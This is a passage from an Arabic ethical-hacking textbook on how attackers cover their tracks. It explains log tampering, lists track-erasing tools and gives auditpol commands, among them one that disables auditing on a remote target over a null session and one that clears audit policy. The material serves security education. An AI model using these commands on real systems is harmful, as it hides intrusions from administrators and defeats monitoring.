‫ﻟﺗﻐطﯾﺔ ﺟﻣﯾﻊ اﻟﻣﺳﺎرات أو اﻟﺳﺟﻼت اﻟﺗﻲ ﯾﺗم إﻧﺷﺎؤھﺎ أﺛﻧﺎء ﻣﻣﺎرﺳﺗﮫ أو ﻣﺣﺎوﻻت اﻟوﺻول إﻟﻰ اﻟﺷﺑﻛﺔ اﻟﻣﺳﺗﮭدﻓﺔ أو اﻟﻛﻣﺑﯾوﺗر‪.‬‬
‫ﻟﻤﺎذا ﻧﺤﺘﺎج اﻟﻰ ﺗﻐﻄﯿﺔ اﻟﻤﺴﺎرات)‪ (Why Cover Tracks‬؟‬

‫اﻟوظﯾﻔﺔ اﻟﻛﺎﻣﻠﺔ ﻟﻠﻣﮭﺎﺟم ﯾﻧطوي ﻟﯾس ﻓﻘط ﻋﻠﻰ اﻟﻣﺳﺎس ﺑﺎﻟﻧظﺎم ﺑﻧﺟﺎح وﻟﻛن أﯾﺿﺎ ﺗﻌطﯾل اﻟﺗﺳﺟﯾل‪ ،‬وﺗطﮭﯾر ﻣﻠﻔﺎت اﻟﺳﺟل‪ ،‬واﻟﻘﺿﺎء ﻋﻠﻰ‬
‫اﻷدﻟﺔ‪ ،‬وزرع أدوات إﺿﺎﻓﯾﺔ‪ ،‬واﻟﺗﻲ ﺗﻐطﻲ اﻟﻣﺳﺎرات‪ .‬اﻟﻣﮭﺎﺟم ﯾﺟب ﻋﻠﯾﮫ ﻣﺳﺢ أي دﻟﯾل ﻋﻠﻰ وﺟوده‪ .‬ﻣﺣو ﺳﺟﻼت اﻟﺗﺳﻠل‪ ،‬وﺗﺗﺑﻊ اﻟﻣﻠﻔﺎت‪،‬‬
‫وﻋﻣﻠﯾﺎت اﻟﮭﺟوم ھو أﻣر ﺑﺎﻟﻎ اﻷھﻣﯾﺔ ﻟﻠﻣﮭﺎﺟﻣﯾن ﻛﻣﺎ ﯾﻣﻛن ﻟﻠرﺳﺎﺋل ﺗﻧﺑﯾﮫ اﻟﻣﺎﻟك اﻟﻔﻌﻠﻲ ﻟﻠﻧظﺎم ﻟﺗﻐﯾﯾر إﻋدادات اﻷﻣﺎن ﻟﺗﺟﻧب اﻟﮭﺟﻣﺎت ﻓﻲ‬
‫اﻟﻣﺳﺗﻘﺑل‪ .‬ﻓﺈذا ﺣدث ھذا‪ ،‬ﻓﺎن اﻟﻣﮭﺎﺟم ﺳوف ﯾﺗرك ﺑﻌد ذﻟك ﻣﻊ ﻋدم وﺟود ﻓرص ﻟﻠوﻟوج اﻟﻰ اﻟﻧظﺎم ﻹطﻼق اﻟﮭﺟوم‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﻓﺎن اﻟﻣﮭﺎﺟم‬
‫ﯾﻘوم ﺑﺗدﻣﯾر اﻷدﻟﺔ ﻋﻠﻰ اﻟﺗدﺧل ﻟﻠﺣﻔﺎظ ﻋﻠﻰ اﻟوﺻول واﻟﺗﮭرب‪ .‬إذا ﻏطﻲ اﻟﻣﮭﺎﺟم أو ﺣذف اﻟﻣﺳﺎرات‪ ،‬ﻓﺎﻧﮫ ﯾﻣﻛن إﻋﺎدة ﺗﺳﺟﯾل اﻟدﺧول إﻟﻰ‬
‫اﻟﻧظﺎم واﻟﺗﺛﺑﯾت اﻟﺧﻔﻲ‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم اﻟﺣﺻول ﻋﻠﻰ اﻟﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎﺳﺔ ﻟﻠﻣﺳﺗﺧدﻣﯾن ﻣﺛل أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت اﻟﻣرور‬
‫ﻟﻠﺣﺳﺎﺑﺎت اﻟﻣﺻرﻓﯾﺔ‪ ،‬وﻣﻌرﻓﺎت اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،‬اﻟﺦ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪481‬‬

‫ﻗد ﻻ ﯾرﻏب اﻟﻣﮭﺎﺟم ﻓﻲ ﺣذف اﻟﺳﺟل ﻛﺎﻣل ﻟﺗﻐطﯾﺔ اﻟﻣﺳﺎرات ﻷﻧﮭﺎ ﻗد ﺗﺗطﻠب اﻣﺗﯾﺎزات اﻟﻣدﯾر‪ .‬إذا ﻛﺎن اﻟﻣﮭﺎﺟم ﻗﺎدرا ﻋﻠﻰ ﺣذف ﺳﺟﻼت‬
‫أﺣداث اﻟﮭﺟوم‪ ،‬ﺣﺗﻰ ذﻟك اﻟﺣﯾن ﻓﺎن اﻟﻣﮭﺎﺟم ﯾﺧﻔﻲ ﻧﻔﺳﮫ ﻣن أن ﯾﺗم اﻛﺗﺷﺎﻓﮫ‪.‬‬

‫اﻟﻣﮭﺎﺟم ﯾﻣﻛﻧﮫ اﻟﺗﻼﻋب ﺑﻣﻠﻔﺎت اﻟﺳﺟل ﺑﻣﺳﺎﻋدة ﻣن اﻻﺗﻲ‪:‬‬


‫)‪ : SECEVENT.EVT (Security‬ﻓﺷل ﺗﺳﺟﯾل اﻟدﺧول‪ ،‬واﻟوﺻول إﻟﻰ اﻟﻣﻠﻔﺎت دون اﻣﺗﯾﺎزات‪.‬‬
‫)‪ :SYSEVENT.EVT (system‬ﻓﺷل ‪ ،driver‬اﻷﺷﯾﺎء اﻟﺗﻲ ﻻ ﺗﻌﻣل ﺑﺷﻛل ﺻﺣﯾﺢ‪.‬‬
‫)‪:APPEVENT.EVT (applications‬‬

‫ﺗﻐطﯾﺔ اﻟﻣﺳﺎرات ‪COVERING TRACKS‬‬

‫ﻣﺣو اﻷدﻟﺔ ھو ﺷرط ﻷي ﻣﮭﺎﺟم اﻟذﯾن ﯾرﻏﺑون ﻓﻲ اﻟﺑﻘﺎء ﻏﺎﻣﺿﯾن‪ .‬ھذا اﻷﺳﻠوب واﺣد ﻟﺗﻔﺎدي اﻟﺗﺗﺑﻊ ﻣرة أﺧرى‪ .‬ﯾﺑدأ ھذا ﻣﻊ ﻣﺣو ﺗﺳﺟﯾﻼت‬
‫اﻟدﺧول اﻟﻣﻠوﺛﺔ ورﺳﺎﺋل اﻟﺧطﺄ اﻟﻣﺣﺗﻣﻠﺔ اﻟﺗﻲ رﺑﻣﺎ ﺗﻛون ﻗد وﻟدت ﻣن ﻋﻣﻠﯾﺔ اﻟﮭﺟوم‪ .‬اﻟﺗﺎﻟﻲ‪ ،‬ﺗﺷﻐﯾل اﻻﻧﺗﺑﺎه إﻟﻰ إﺣداث أﯾﺔ ﺗﻐﯾﯾرات ﺑﺣﯾث ﻻ‬
‫ﯾﺳﻣﺢ ﺑﺗﺳﺟﯾل اﻟدﺧول اﻟﻣﺳﺗﻘﺑﻠﻲ‪ .‬ﻋن طرﯾﻖ اﻟﺗﻼﻋب واﻟﺗﻐﯾﯾر واﻟﺗﺑدﯾل ﻓﻲ ﺳﺟﻼت اﻷﺣداث‪ ،‬ﯾﻣﻛن ﻟﻣﺳؤول اﻟﻧظﺎم أن ﯾﻛون ﻋﻠﻰ ﻗﻧﺎﻋﺔ ﺑﺄن‬
‫إﺧراج اﻟﻧظﺎم ﺻﺣﯾﺢ‪ ،‬وأﻧﮫ ﻻ ﯾوﺟد ﺗﺳرﯾب أو ﺣل وﺳط ﻗد اﺗﺧذت ﻓﻌﻼ‪.‬‬
‫إن أول ﺷﻲء ﯾﻘوم ﺑﮫ ﻣﺳؤول اﻟﻧظﺎم ﻟﻣراﻗﺑﺔ اﻟﻧﺷﺎط ﻏﯾر ﻋﺎدي ھو اﻟﺗﺣﻘﻖ ﻣن ﻣﻠﻔﺎت ﺳﺟل اﻟﻧظﺎم‪ ،‬ﻓﺈﻧﮫ ﻣن اﻟﺷﺎﺋﻊ ﻟﻠدﺧﻼء اﺳﺗﺧدام اﻷداة‬
‫اﻟﻣﺳﺎﻋدة ﻟﺗﻌدﯾل ﺳﺟﻼت اﻟﻧظﺎم‪ .‬ﻓﻲ ﺑﻌض اﻟﺣﺎﻻت‪ rootkits ،‬ﯾﻣﻛﻧﮫ ﺗﻌطﯾل وﺗﺟﺎھل ﻛﺎﻓﺔ اﻟﺳﺟﻼت اﻟﻣوﺟودة‪ .‬ﯾﺣدث ھذا إذا ﻛﺎن اﻟﻣﺗﺳﻠﻠﯾن‬
‫ﯾﻧون اﺳﺗﺧدام اﻟﻧظﺎم ﻟﻔﺗرة أطول ﻣن اﻟزﻣن ﻛﻘﺎﻋدة اﻧطﻼق ﻟﻌﻣﻠﯾﺎت اﻻﻗﺗﺣﺎم ﻓﻲ اﻟﻣﺳﺗﻘﺑل‪ ،‬إذا ﻛﺎﻧت إزاﻟﺔ ﺗﻠك اﻷﺟزاء ﻓﻘط ﻣن اﻟﺳﺟﻼت اﻟﺗﻲ‬
‫ﯾﻣﻛن أن ﺗﻛﺷف ﻋن وﺟود اﻟﮭﺟوم‪.‬‬
‫ﯾﺗﺣﺗم ﻋﻠﻰ اﻟﻣﮭﺎﺟﻣﯾن ﺟﻌل اﻟﻧظﺎم ﯾﺑدو وﻛﺄﻧﮫ ﻓﻌﻼ ﯾﺑدو ﻗﺑل أن ﯾﺗﻣﻛن ﻣن اﻟوﺻول ﻟﻠﻧظﺎم وﺗﺛﺑﯾت‪ Backdoor‬ﻻﺳﺗﺧداﻣﮭﺎ‪ .‬أي ﻣن اﻟﻣﻠﻔﺎت‬
‫اﻟﺗﻲ ﺗم ﺗﻌدﯾﻠﮭﺎ ﺗﺣﺗﺎج إﻟﻰ ﺗﻐﯾﯾره ﻣرة أﺧرى إﻟﻰ ﺻﻔﺎﺗﮫ اﻷﺻﻠﯾﺔ)‪ . (original attributes‬ھﻧﺎك اﻟﻌدﯾد ﻣن اﻷدوات اﻟﺗﻲ ﺗﺳﺗﺧدم ﻟﺗﻐطﯾﺔ‬
‫اﻟﻣﺳﺎرات اﻟﻣﺗﻌﻠﻘﺔ ﺑﻧظﺎم اﻟﺗﺷﻐﯾل ‪ .NT‬ﻗﺎﺋﻣﺔ اﻟﻣﻌﻠوﻣﺎت‪ ،‬ﻣﺛل ﺣﺟم اﻟﻣﻠف واﻟﺗﺎرﯾﺦ‪ ،‬ھو ﻣﺟرد ﻣﻌﻠوﻣﺎت وﺻﻔﯾﮫ )‪ (attribute‬ﺑداﺧل اﻟﻣﻠف‪.‬‬
‫اﻟﺣﻣﺎﯾﺔ ﺿد اﻟﻣﮭﺎﺟﻣﯾن اﻟذي ﯾﺣﺎول ﺗﻐطﯾﺔ ﻣﺳﺎرات اﻟﮭﺟوم ﻋن طرﯾﻖ ﺗﻐﯾﯾر ﻣﻌﻠوﻣﺎت اﻟﻣﻠف ﺗﺻﺑﺢ ﺻﻌﺑﺔ‪ .‬وﻣﻊ ذﻟك‪ ،‬ﻓﻣن اﻟﻣﻣﻛن اﻟﻛﺷف‬
‫ﻋﻣﺎ إذا ﻛﺎن اﻟﻣﮭﺎﺟم ﻗد ﻏﯾر ﻣﻌﻠوﻣﺎت اﻟﻣﻠف ﻋن طرﯾﻖ ﺣﺳﺎب ھﺎش اﻟﺗﺷﻔﯾر ﻋﻠﻰ اﻟﻣﻠف‪ .‬ھذا اﻟﻧوع ﻣن اﻟﮭﺎش ھو اﻟﺣﺳﺎب)‪(calculation‬‬
‫اﻟذي ﯾﺗم ﺿد اﻟﻣﻠف ﺑﺄﻛﻣﻠﮫ ﺛم ﺗﺷﻔﯾره‪.‬‬
‫طﺮق ﻣﺴﺢ اﻟﻤﺴﺎرات اون ﻻﯾﻦ )‪(Ways to Clear Online Tracks‬‬
‫اﻹﻧﺗرﻧت ھو اﻟﻣورد اﻟﻧﮭﺎﺋﻲ ﻟﻠﺑﺣث أو ﻟﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﺗﺗﻌﻠﻖ ﺑﺄي ﻣوﺿوع‪ .‬ﻟﻸﺳف‪ ،‬ﯾﺳﺎء اﺳﺗﺧدام ﻣوارد اﻹﻧﺗرﻧت ﻣن ﻗﺑل اﻟﻣﮭﺎﺟﻣﯾن‬
‫ﻟﺗﻌﻘب أﻧﺷطﺔ اﻵﺧرﯾن ﻋﺑر اﻹﻧﺗرﻧت‪ ،‬واﻟﺗﻲ ﺗﺳﻣﺢ ﻟﮭم ﺑﺷن اﻟﮭﺟﻣﺎت أو اﻟﺳرﻗﺔ‪.‬‬
‫ھﻧﺎك ﻋدة طرق ﻟﻣﺳﺢ اﻟﻣﺳﺎرات اون ﻻﯾن‪:‬‬
‫‪ -‬اﻟﺗﺻﻔﺢ اﻟﺧﺎص ‪Private browsing‬‬
‫‪ -‬اﻟﺗﺎرﯾﺦ ﻓﻲ ﺣﻘل اﻟﻌﻧوان ‪History in the address field‬‬
‫‪ -‬ﺗﻌطﯾل ﺗﺧزﯾن اﻟﺗﺎرﯾﺦ ‪Disable stored history‬‬
‫‪ -‬ﺣذف اﻟﺑﯾﺎﻧﺎت اﻟﺧﺎﺻﺔ ‪Delete private data‬‬
‫‪ -‬ﺣذف ﻣﻠﻔﺎت اﻟﻛوﻛﯾز ﻋﻧد اﻟﺧروج ‪Clear cookies on exit‬‬
‫‪ -‬ﺗﻔرﯾﻎ ذاﻛرة اﻟﺗﺧزﯾن اﻟﻣؤﻗت ﻋﻧد اﻟﺧروج ‪Clear cache on exit‬‬
‫‪ -‬ﺣذف اﻟﺗﻧزﯾﻼت ‪Delete downloads‬‬
‫‪ -‬ﺗﻌطﯾل ﻣدﯾر ﻛﻠﻣﺔ اﻟﺳر ‪Disable password manager‬‬
‫‪ -‬ﺗﻔرﯾﻎ اﻟﺑﯾﺎﻧﺎت ﻓﻲ إدارة ﻛﻠﻣﺔ اﻟﻣرور ‪Clear data in password manager‬‬
‫‪ -‬ﺣذف اﻟﺟﻠﺳﺎت اﻟﻣﺣﻔوظﺔ ‪Delete saved sessions‬‬
‫‪ -‬ﺣذف ﺟﺎﻓﺎ ﺳﻛرﯾﺑت اﻟﻣﺳﺗﺧدم ‪Delete user JavaScript‬‬
‫‪ -‬اﻧﺷﺎء ﻋدة ﻣﺳﺗﺧدﻣﯾن ‪Set up multiple users‬‬
‫‪ -‬ﺣذف أﻛﺛر اﻷﺷﯾﺎء اﻟﻣﺳﺗﺧدﻣﺔ ﻣؤﺧرا )‪Remove Most Recently Used (MRU‬‬
‫‪ -‬ﺗﻔرﯾﻎ ﺑﯾﺎﻧﺎت ﺷرﯾط اﻷدوات ﻣن اﻟﻣﺗﺻﻔﺣﺎت ‪Clear Toolbar data from the browsers‬‬
‫‪ -‬إﯾﻘﺎف اﻹﻛﻣﺎل اﻟﺗﻠﻘﺎﺋﻲ ‪Turn off Autocomplete‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪482‬‬

‫‪Disabling Auditing: Auditpol‬‬

‫اﻟﻣﺻدر‪http://technet.microsoft.com/en-us :‬‬
‫واﺣدة ﻣن اﻟﺧطوات اﻷوﻟﻰ ﻟﻠﻣﮭﺎﺟم اﻟذي ﻟدﯾﮫ اﻟﻘدرة ﻋﻠﻰ اﺳﺗﺧدام ﺳطر اﻷواﻣر )‪(cmd‬ھو ﺗﺣدﯾد ﺣﺎﻟﺔ اﻟﺗدﻗﯾﻖ )‪ (auditing‬ﻟﻠﻧظﺎم اﻟﮭدف‪،‬‬
‫ﺗﺣدﯾد ﻣوﻗﻊ اﻟﻣﻠﻔﺎت اﻟﺣﺳﺎﺳﺔ )ﻣﺛل ﻣﻠﻔﺎت ﻛﻠﻣﺔ اﻟﺳر(‪ ،‬وزرع أدوات ﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﯾﺎ )ﻣﺛل ﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ أو اﻟﺗﺟﺳس ﻋﻠﻰ‬
‫اﻟﺷﺑﻛﺔ ]‪.( [network sniffer‬‬
‫‪ Windows auditing‬ﺗﻘوم ﺑﺗﺳﺟﯾل ﺑﻌض اﻷﺣداث إﻟﻰ ﺳﺟل اﻷﺣداث)‪) (event log‬أو ‪ syslog‬اﻟﻣرﺗﺑطﺔ ﺑﮭﺎ(‪ .‬ﯾﻣﻛن ﺗﻌﯾﯾن ﺳﺟل‬
‫ﻹرﺳﺎل ﺗﻧﺑﯾﮭﺎت )اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،pager ،‬وھﻠم ﺟرا( إﻟﻰ ﻣﺳؤول اﻟﻧظﺎم‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﻓﺈن اﻟﻣﮭﺎﺟم ﯾرﯾد أن ﯾﻌرف ﺣﺎﻟﺔ ﺗدﻗﯾﻖ اﻟﻧظﺎم‬
‫)‪ (Windows auditing‬اﻟذي ﯾﺣﺎول اﺧﺗراﻗﮫ ﻗﺑل اﻟﺷروع ﻓﻲ ﺗﻧﻔﯾذ ﺧططﮫ‪.‬‬
‫أداة ‪ Auditpol.exe‬ھو ﺟزء ﻣن ﻣﺟﻣوﻋﺔ أدوات ‪ NT resource kit‬واﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻛﺄﻧﮭﺎ ﺳطر أواﻣر ﺑﺳﯾط ﻟﻣﻌرﻓﺔ ﺣﺎﻟﺔ ﺗدﻗﯾﻖ‬
‫اﻟﻧظﺎم )‪ (Windows auditing‬اﻟﮭدف وأﯾﺿﺎ إﺟراء ﺗﻐﯾﯾرات ﻋﻠﯾﮫ‪.‬‬
‫ﺳوف اﻟﻣﮭﺎﺟم ﺗﺣﺗﺎج إﻟﻰ ﺗﺛﺑﯾت اﻷداة ﻓﻲ ﻣﺳﺎر ‪ .WINNT‬وﻣن ھﻧﺎ ﯾﻣﻛﻧﮫ ﺗﺄﺳﯾس ﺟﻠﺳﺔ ﻋﻣل ﻓﺎرﻏﺔ )‪ (Null Session‬إﻟﻰ اﻟﺟﮭﺎز اﻟﮭدف‬
‫ﺛم ﯾﻘوم ﺑﺗﺷﻐﯾل اﻷﻣر‪:‬‬
‫>‪C:\> auditpol \\<ip address of target‬‬
‫ھذا ﺳوف ﯾﻛﺷف ﺣﺎﻟﺔ اﻟﺗدﻗﯾﻖ)‪ (auditing status‬اﻟﺣﺎﻟﯾﺔ ﻟﻠﻧظﺎم‪ .‬ﺛم اﻧﮫ ﯾﻣﻛن أن ﯾﺧﺗﺎر ﺗﻌطﯾل اﻟﺗدﻗﯾﻖ)‪ (auditing‬ﺑواﺳطﺔ‪:‬‬
‫‪C :\> auditpol \\<ip address of target) /disable‬‬
‫ھذا اﻻﺟراء ﺳوف ﯾﻘوم ﺑﺎﻟﻌدﯾد ﻣن اﻟﺗﻐﯾﯾرات ﻓﻲ ﻣﺧﺗﻠف ﻣﻠﻔﺎت اﻟﺳﺟﻼت اﻟﺗﻲ ﺗﺳﺟل أي ﻣن اﻻﻓﻌﺎل‪ .‬اﻧﮫ ﯾﻣﻛن أن ﯾﺧﺗﺎر ﻹﺧﻔﺎء ﺗﻐﯾرات‬
‫ﻣﻔﺎﺗﯾﺢ اﻟﺗﺳﺟﯾل ﻓﻲ وﻗت ﻻﺣﻖ‪.‬‬
‫ﻟﺣظﺔ ﻛﺳب اﻣﺗﯾﺎزات إدارﯾﺔ ﻣن ﻗﺑل اﻟدﺧﻼء‪ ،‬ﻓﺈﻧﮫ ﯾﻣﻛن ﺗﻌطﯾل اﻟﺗدﻗﯾﻖ ﺑﻣﺳﺎﻋدة ‪ .auditpol.exe‬ﺑﻣﺟرد اﻻﻧﺗﮭﺎء ﻣن ﻋﻣﻠﮫ‪ ،‬ﻓﺎﻧﮫ ﺑﻌد‬
‫ﺧروج اﻟدﺧﻼء ﯾﺗم ﺗﻔﻌﯾل اﻟﺗدﻗﯾﻖ ﻣرة أﺧرى ﺑﺎﺳﺗﺧدام ﻧﻔس اﻷداة‪.audit.exe :‬‬
‫ﻣﻦ اﻟﻤﺜﺎل اﻟﺘﺎﻟﻲ ﺳﻮف ﻧﺘﻌﻠﻢ ﻛﯿﻔﯿﺔ اﻋﺪاد ‪Audit policy‬‬

‫ﻧﻘوم ﺑﻔﺗﺢ ﺳطر اﻷواﻣر ‪ Command Prompt‬ﻛﻣﺳﺗﺧدم اﻟﻣدﯾر )‪.(Administrator‬‬ ‫‪-‬‬


‫ﻟﻣﻌرﻓﺔ ﺟﻣﯾﻊ ‪ Audit policies‬ﯾﻣﻛن ذﻟك ﻣن ﺧﻼل ﻛﺗﺎﺑﺔ اﻻﻣر اﻟﺗﺎﻟﻲ‪:‬‬ ‫‪-‬‬
‫*‪C:\> auditpol /get/category:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪483‬‬

‫ﻟﺗﻔﻌﯾل أي ﻣن ‪ Audit policies‬ﯾﺗم ذﻟك ﻣن ﺧﻼل طﺑﺎﻋﺔ اﻻﻣر اﻟﺗﺎﻟﻲ‪:‬‬ ‫‪-‬‬


‫‪C:\> auditpol /set/category:”system”,”account logon” /success:enable /failure:enable‬‬

‫ﻟﺗﻔرﯾﻎ أي ﻣن ‪ Audit policies‬ﯾﺗم ذﻟك ﻣن ﺧﻼل طﺑﺎﻋﺔ اﻻﻣر ]‪.[auditpol /clear /y‬‬ ‫‪-‬‬

‫‪Covering Tracks Tool: CCleaner‬‬

‫اﻟﻣﺻدر‪http://www.piriform.com :‬‬
‫‪ CCleaner‬ھو أداه ﻟﺗﺣﺳﯾن اﻟﻧظﺎم ‪ ،‬اﻟﺧﺻوﺻﯾﺔ‪ ،‬وأداة ﺗﻧظﯾف‪ .‬ﻓﺈﻧﮫ ﯾﺳﻣﺢ ﻟك ﺑﺈزاﻟﺔ اﻟﻣﻠﻔﺎت اﻟﻐﯾر ﻣﺳﺗﺧدﻣﺔ وﯾﻧظف آﺛﺎر ﺗﻔﺎﺻﯾل ﺗﺻﻔﺢ‬
‫اﻹﻧﺗرﻧت ﻣن ﺧﻼل ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ .‬ﻓﺈﻧﮫ ﯾﺣﻔظ ﺧﺻوﺻﯾﺗك ﻋﻠﻰ اﻹﻧﺗرﻧت‪ ،‬وﯾﺟﻌل اﻟﻧظﺎم أﺳرع وأﻛﺛر أﻣﻧﺎ‪ .‬ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ذﻟك‪ ،‬ﻓﺈﻧﮫ ﯾﺣرر‬
‫ﻣﺳﺎﺣﺔ اﻟﻘرص اﻟﺛﺎﺑت ﻻﺳﺗﺧداﻣﮭﺎ ﻣرة أﺧرى‪ .‬ﻣﻊ ھذه اﻷداة‪ ،‬ﯾﻣﻛﻧك ﻣﺣو اﻟﻣﺳﺎرات اﻟﺧﺎﺻﺔ ﺑك ﺑﺳﮭوﻟﺔ ﺟدا‪ .‬ﻛﻣﺎ أﻧﮫ ﯾﻧظف آﺛﺎر اﻷﻧﺷطﺔ‬
‫اﻟﺧﺎﺻﺔ ﺑك ﻋﻠﻰ اﻻﻧﺗرﻧت ﻣﺛل ﺗﺎرﯾﺦ اﻹﻧﺗرﻧت اﻟﺧﺎص ﺑك‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪484‬‬

‫‪Covering Tracks Tool: MRU-Blaster‬‬

‫اﻟﻣﺻدر‪http://www.brightfort.com :‬‬
‫‪ MRU-Blaster‬ھو ﺗطﺑﯾﻖ ﯾﺳﻣﺢ ﻟك ﺑﺗﻧظﯾف أﻛﺛر اﻟﻘواﺋم اﻟﻣﺳﺗﺧدﻣﺔ ﻣؤﺧرا ﻋﻠﻰ اﻟﻧظﺎم‪ ،‬وﻣﻠﻔﺎت اﻻﻧﺗرﻧت اﻟﻣؤﻗﺗﺔ‪ ،‬واﻟﻛوﻛﯾز‪ .‬ﻗﺎﺋﻣﺔ‬
‫‪MRU‬ﯾوﻓر ﻟك ﻣﻌﻠوﻣﺎت ﻛﺎﻣﻠﺔ ﻋن أﺳﻣﺎء وﻣواﻗﻊ اﻟﻣﻠﻔﺎت اﻷﺧﯾرة اﻟﺗﻲ وﺻﻠت إﻟﯾﮭﺎ‪ ،‬ﻓﺗﺢ‪ ،‬ﺣﻔظ‪ ،‬واﻟﻧظر ﻓﯾﮭﺎ‪ .‬ﻓﺈﻧﮫ ﯾﺿﻣن ﺧﺻوﺻﯾﺔ‬
‫اﻹﻧﺗرﻧت اﻟﺧﺎص ﺑك ‪ MRU-Blaster .‬ﯾﻌﺎﻟﺞ ﺑﺄﻣﺎن ﺗﻧظﯾف "اﻟﻣﺳﺎرات اﻟﻣﺳﺗﺧدﻣﺔ" و ﻏﯾرھﺎ ﻣن اﻟﻣﺧﻠﻔﺎت اﻟﺗﻲ ﺗﺗرﻛﮭﺎ ﻣﻌظم اﻟﺑراﻣﺞ‬
‫وراءھﺎ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪485‬‬

‫‪Track Covering Tools‬‬

‫أدوات ﺗﻐطﯾﺔ اﻟﻣﺳﺎرات )‪ (Track covering tools‬ﯾﺣﻣﻲ اﻟﻣﻌﻠوﻣﺎت اﻟﺷﺧﺻﯾﺔ اﻟﺧﺎﺻﺔ ﺑك ﻓﻲ ﺟﻣﯾﻊ أﻧﺣﺎء ﺗﺻﻔﺢ اﻹﻧﺗرﻧت اﻟﺧﺎص ﺑك‬
‫ﻋن طرﯾﻖ ﺗﻧظﯾف ﺟﻣﯾﻊ اﻟﻣﺳﺎرات ﻣن أﻧﺷطﺔ اﻹﻧﺗرﻧت ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ .‬ﺗﻔرغ ذاﻛرة اﻟﺗﺧزﯾن اﻟﻣؤﻗت‪ ،‬ﺣذف ﻣﻠﻔﺎت اﻟﻛوﻛﯾز‪ ،‬ﺗﻔرغ‬
‫‪ Internet history‬اﻟﺗﻲ ﺗﺷﺎرك اﻟﻣﻠﻔﺎت اﻟﻣؤﻗﺗﺔ‪ ،‬ﺣذف ﺳﺟﻼت‪ ،‬وﺗﺟﺎھل اﻟﻐﯾر اﻟﻣرﻏوب ﻓﯾﮫ‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﻣن ھذه اﻷدوات ﻋﻠﻰ‬
‫اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬
‫‪Wipe available at http://privacyroot.com‬‬
‫‪Tracks Eraser Pro available at http://www.acesoft.net‬‬
‫‪BleachBit available at http://bleachbit.sourceforge.net‬‬
‫‪Absoluteshield Internet Eraser Pro available at http://www.internet-track-eraser.com‬‬
‫‪Clear My History available at http://www.hide-my-ip.com‬‬
‫‪EvidenceEraser available at http://evidence-eraser-pro.en.softonic.com‬‬
‫‪WinTools.net Professional available at http://www.wintools.net‬‬
‫‪RealTime Cookie & Cache Cleaner (RtC3) available at http://www.kleinsoft.co.za‬‬
‫‪AdvaHist Eraser available at http://advahist-eraser.software.informer.com‬‬
‫‪Free Internet Window Washer available at http://www.eusing.com‬‬

‫‪PENETRATION TESTING 5.8‬‬

‫ﻛﻣﺧﺗﺑر اﻻﺧﺗراق‪ ،‬ﯾﺟب ﺗﻘﯾﯾم اﻟوﺿﻊ اﻷﻣﻧﻲ ﻟﻠﺷﺑﻛﺔ اﻟﻣﺳﺗﮭدﻓﺔ أو اﻟﻧظﺎم‪ .‬ﻟﺗﻘﯾﯾم اﻷﻣن‪ ،‬ﯾﺟب أن ﺗﺣﺎول ﻛﺳر أﻣن اﻟﻧظﺎم اﻟﺧﺎص ﺑك ﻋن‬
‫طرﯾﻖ ﻣﺣﺎﻛﺎة ھﺟﻣﺎت ﻣﺧﺗﻠﻔﺔ ﻋﻠﻰ اﻟﻧظﺎم‪ ،‬ﺗﻣﺎﻣﺎ ﻣﺛل ﻣﺎ ﯾﻘوم ﺑﮫ اﻟﻣﮭﺎﺟم‪ .‬ھﻧﺎك ﺑﻌض اﻟﺧطوات اﻟﺗﻲ ﺗﺣﺗﺎج ﻟﻣﺗﺎﺑﻌﺔ إﺟراء اﺧﺗﺑﺎر اﻻﺧﺗراق‬
‫اﻟﻧظﺎم‪ .‬وﺳﯾﻛون ھذا اﻟﻘﺳم ﯾﻌﻠﻣك ﻛﯾﻔﯾﺔ إﺟراء ﻧظﺎم اﻟﻘرﺻﻧﺔ ﻛﺎﺧﺗﺑﺎر اﻻﺧﺗراق‪.‬‬

‫‪Password Cracking‬‬

